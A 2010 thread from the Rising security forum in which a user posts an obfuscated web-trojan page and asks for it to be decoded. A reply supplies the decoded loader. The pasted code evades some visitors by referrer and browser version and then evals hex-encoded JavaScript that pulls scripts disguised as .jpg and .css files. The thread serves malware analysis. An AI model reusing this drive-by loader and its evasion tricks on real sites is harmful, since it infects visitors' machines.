帮我解密这个网马 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流帮我解密这个网马

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] 帮我解密这个网马

痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:	发表于： 2010-01-17 18:42 \| 只看楼主短消息资料字号：小中大 1楼帮我解密这个网马 <html> <SCRIPT LANGUAGE="JavaScript"> <!-- Hide function killErrors() { return true; } window.onerror = killErrors; // --> </SCRIPT> <script> //var parent_url = window.parent.location.href.toLowerCase(); var where = document.referrer.toLowerCase(); var self_url = document.location.href.toLowerCase(); if(where.indexOf("gov.")>=0 \|\| where == "") { location.replace("about:blank"); } </script> <script> nav=navigator.userAgent.toLowerCase(); wxp=((nav.indexOf('\x77\x69\x6e\x64\x6f\x77\x73\x20\x6e'+'\x74\x20\x35\x2e\x31')!=-1)\|\|(nav.indexOf ('windows xp')!=-1)); if(!wxp\|\|navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73"+"\x69\x65 \x36")==-1) location.replace("about:blank"); </script> <script language="JavaScript"> window.onerror=function(){return true;} if(document.cookie.indexOf("CoreBeta=")==-1) { var expires=new Date(); expires.setTime(expires.getTime()+2460601000); document.cookie="CoreBeta=Yes;path=/;expires="+expires.toGMTString(); document.writeln("<html> "); document.writeln("<body style=\"overflow-y:hidden\" scroll=\"no\" oncontextmenu=\"return false\"> "); var code="\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x64\x69\x76\x20\x69\x64\x3d\x5c\x22\x44\x69\x76\x49\x44\x5c\x22\x3e\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x61\x2e\x6a\x70\x67\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x63\x2e\x6a\x70\x67\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x64\x2e\x63\x73\x73\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x65\x2e\x6a\x70\x67\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x66\x2e\x63\x73\x73\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b"; eval(code); document.writeln("<\/body> "); document.writeln("<\/html>"); } else location.replace("about:blank"); </script> <script language="javascript"> var lessen= 50; function rand() { var num = Math.random()100; return num; } var num = rand(); if(num <= lessen) { } else { document.writeln("<script type=\"text/javascript\" src=\"http://js.tongji.linezing.com/615056/tongji.js\"><\/script>"); } document.writeln("<script type=\"text/javascript\" src=\"http://js.tongji.linezing.com/1389409/tongji.js\"><\/script>"); </script> </html> 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:	分享到：

五花草甸锋芒艾服狮帖子:1588 注册: 2009-08-04 来自:	发表于： 2010-01-17 18:54 \| 短消息资料字号：小中大 2楼回复：帮我解密这个网马 document.writeln("<div id=\"DivID\"> ");document.writeln("<script src=\'a.jpg\'><\/script> ");document.writeln("<script src=\'c.jpg\'><\/script> ");document.writeln("<script src=\'d.css\'><\/script> ");document.writeln("<script src=\'e.jpg\'><\/script> ");document.writeln("<script src=\'f.css\'><\/script> "); 一切皆有可能。 2011常见问题请参考： http://www.ikaka.com.cn/csc_faq/index.shtml
五花草甸锋芒艾服狮帖子:1588 注册: 2009-08-04 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT